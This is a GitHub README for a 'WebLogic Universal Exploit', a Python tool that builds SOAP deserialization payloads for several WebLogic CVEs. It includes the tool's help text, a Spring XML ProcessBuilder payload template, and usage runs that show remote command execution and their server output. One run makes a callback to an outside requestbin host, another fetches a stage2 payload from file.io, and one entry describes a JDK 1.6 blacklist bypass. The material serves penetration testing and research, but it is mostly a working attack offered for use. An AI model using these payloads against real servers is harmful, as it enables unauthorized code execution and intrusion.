/CVE-2019-2725

WebLogic Insecure Deserialization - CVE-2019-2725 payload builder & exploit

Primary LanguagePython

CVE-2019-2725

WebLogic Universal Exploit - CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729 payload builder & exploit

Info / Help

$ python3 weblogic_exploit.py -h

========================================================================
|                      WebLogic Universal Exploit                      |
|    CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729    |
|                               by pimps                               |
========================================================================

usage: weblogic_exploit.py [-h] [-pl PAYLOAD] [-ep ENDPOINT] [-c CMD] [-j]
                           [-u URL] [-y YSOSERIAL] [-tr TERMINAL] [-px PROXY]
                           target

positional arguments:
  target                               Target Server

optional arguments:
  -h, --help                           show this help message and exit
  -pl PAYLOAD, --payload PAYLOAD       Use one of the available payloads: (default: fs_xml_app_ctx)
                                       		- process_builder (CMD - all versions)
                                       		- unit_of_work_change_set (SERIAL - 10.x versions)
                                       		- event_data (CMD - 12.x versions)
                                       		- fs_xml_app_ctx (URL - all versions).
  -ep ENDPOINT, --endpoint ENDPOINT    Use one of the configured endpoints: (default: automatic)
                                       		- wls_wsat (CMD output)
                                       		- _async (Blind Exec).
  -c CMD, --cmd CMD                    Command to execute. (default: whoami)
  -j, --jdk6                           Enable CVE-2019-2729 (bypass for 'class'). DISCLAIMER: Works ONLY in JDK 1.6!
  -u URL, --url URL                    Url to fetch stage2. Used with 'URL' payloads. (default: None)
  -y YSOSERIAL, --ysoserial YSOSERIAL  Custom YSOSERIAL payload file. Used with 'SERIAL' payloads. (default: None)
  -tr TERMINAL, --terminal TERMINAL    Use one of the available terminals: cmd, bash, powershell, none (default: bash)
  -px PROXY, --proxy PROXY             Configure a proxy in the format http://127.0.0.1:8080/ (default: None)

This script will generate a valid WebLogic SOAP payload to exploit different CVE's on this web server.

Usage Examples

With the SERIAL payloads, you can pass in a cmd (to dinamically generate a ysoserial payload) or manually generate a ysoserial payload and give it to the script using the -y argument.

To dinamically generate a ysoserial payload you should download the https://github.com/pimps/ysoserial-modified/blob/master/target/ysoserial-modified.jar and place it in the same directory of this script.

The payload unit_of_work_change_set is well know to work only in weblogic 10.x versions. Examples:

pimps$ java -jar ysoserial-modified.jar Jdk7u21 bash 'nslookup your.server.com' > ysoserial_payload.bin
pimps$ python3 weblogic_exploit.py -y ysoserial_payload.bin -pl unit_of_work_change_set -px http://127.0.0.1:8080 https://target.server.com

========================================================================
|                      WebLogic Universal Exploit                      |
|    CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729    |
|                               by pimps                               |
========================================================================

[+] YSOSERIAL payload size: 3182
[+] Weblogic SOAP payload built with success...
[+] Firing exploit now...
[+] Bomb delivered... Server responded:

HTTP/1.1 202
Connection: close
Date: Wed, 28 Aug 2019 01:39:52 GMT
Content-Length: 0

pimps$ python3 weblogic_exploit.py -c 'nslookup your.server.com' -pl unit_of_work_change_set -px http://127.0.0.1:8080 https://target.server.com

========================================================================
|                      WebLogic Universal Exploit                      |
|    CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729    |
|                               by pimps                               |
========================================================================

[+] YSOSERIAL payload size: 3027
[+] Weblogic SOAP payload built with success...
[+] Firing exploit now...
[+] Bomb delivered... Server responded:

HTTP/1.1 202
Connection: close
Date: Wed, 28 Aug 2019 01:46:33 GMT
Content-Length: 0

With the URL payloads (FileSystemXmlApplicationContext) you can host your own XML and pass it with the argument -u or let the exploit generate an ephemeral payload file for you and host it at https://file.io! This payload will be generated during the exploitation phase and will be deleted once the server fetches it remotely. If you want host your own payload, please use the following template for this:

<?xml version="1.0" encoding="utf-8"?>
<beans xmlns="http://www.springframework.org/schema/beans" 
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 
  xsi:schemaLocation="http://www.springframework.org/schema/beans 
  http://www.springframework.org/schema/beans/spring-beans.xsd">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
        <value>bash</value>
        <value>-c</value>
        <value><![CDATA[echo "this is my bash command, change terminal if needed"]]></value>
      </list>
    </constructor-arg>
  </bean>
</beans>

This payload is well known to work in all versions of weblogic. The disvantage of this payload is because it needs egress in the target server to fetch a stage2 payload. An example in how to use this payload is described below:

$ python weblogic_exploit.py -tr powershell -c 'Invoke-WebRequest http://requestbin.net/r/h4x31337' -pl fs_xml_app_ctx -px http://127.0.0.1:8080 https://target.server.com

========================================================================
|                      WebLogic Universal Exploit                      |
|    CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729    |
|                               by pimps                               |
========================================================================

[-] No stage2 URL provided... Storing it now...
[+] Stage2 payload stored with success at: https://file.io/IbCIbg
[+] Weblogic SOAP payload built with success...
[+] Firing exploit now...
[+] Bomb delivered... Server responded:

HTTP/1.1 202
Connection: close
Date: Tue, 27 Aug 2019 07:42:24 GMT
Content-Length: 0

And last but not least, the process_builder payload is the most common exploit payload (metasploit module) that works in weblogic versions not patched to the class= blacklist. This payload was customized to print the command output in the response body of the request. Example of usage:

pimps$ python3 weblogic_exploit.py -c "id; uname -a" -pl process_builder http://localhost:7001/

========================================================================
|                      WebLogic Universal Exploit                      |
|    CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729    |
|                               by pimps                               |
========================================================================

[+] Weblogic SOAP payload built with success...
[+] Firing exploit now...
[+] Bomb delivered... Server responded:

HTTP/1.1 200
Connection: close
Date: Thu, 29 Aug 2019 12:30:26 GMT
Transfer-Encoding: chunked

uid=1000(oracle) gid=1000(oracle) groups=1000(oracle)
Linux wlsadmin 4.9.125-linuxkit #1 SMP Fri Sep 7 08:20:28 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

Updates

29/08/2019

Added support to the event_data payload with command output in the response body. Example of usage:

$ python3 weblogic_exploit.py -c 'id; uname -a' -pl event_data http://localhost:7001

========================================================================
|                      WebLogic Universal Exploit                      |
|    CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729    |
|                               by pimps                               |
========================================================================

[+] Weblogic SOAP payload built with success...
[+] Firing exploit now...
[+] Bomb delivered... Server responded:

HTTP/1.1 200
Connection: close
Date: Thu, 29 Aug 2019 07:37:26 GMT
Transfer-Encoding: chunked

uid=1000(oracle) gid=1000(oracle) groups=1000(oracle)
Linux wlsadmin 4.9.125-linuxkit #1 SMP Fri Sep 7 08:20:28 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

Credits: Used part of the payload published in this github to print the command results in the response body (https://github.com/lufeirider/CVE-2019-2725/blob/master/CVE-2019-2725.py). Thanks for share this @lufeirider.

26/09/2019

Added support to CVE-2019-2729. Its a bypass to change <class> </class> for <array method="forName"> </array>. This bypass works only in the JDK 1.6 due a discrepancy in how this JDK version parses XML data via XMLDecoder.

The command argument -j/--jdk6 was added to the exploit script.